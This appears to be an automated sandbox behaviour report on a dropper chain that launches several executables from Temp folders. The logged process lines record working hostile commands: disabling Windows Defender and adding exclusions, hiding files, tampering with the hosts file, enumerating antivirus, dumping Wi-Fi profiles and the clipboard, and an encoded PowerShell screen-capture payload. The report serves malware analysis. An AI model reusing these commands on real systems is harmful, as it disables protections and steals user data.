                                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                Source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                Source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                Source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                Source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                Source: D1UL0FG.exe, 00000006.00000003.2639961783.000001FA2F17F000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2831845470.0000000003B77000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2832160533.0000000003B5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                Source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                Source: file.exeReversingLabs: Detection: 47%
                                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: D1UL0FG.exeString found in binary or memory: set-addPolicy
                                Source: D1UL0FG.exeString found in binary or memory: id-cmc-addExtensions
                                Source: D1UL0FG.exeString found in binary or memory: can't send non-None value to a just-started generator
                                Source: D1UL0FG.exeString found in binary or memory: --help
                                Source: D1UL0FG.exeString found in binary or memory: --help
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe""
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe "C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeProcess created: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeProcess created: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe"
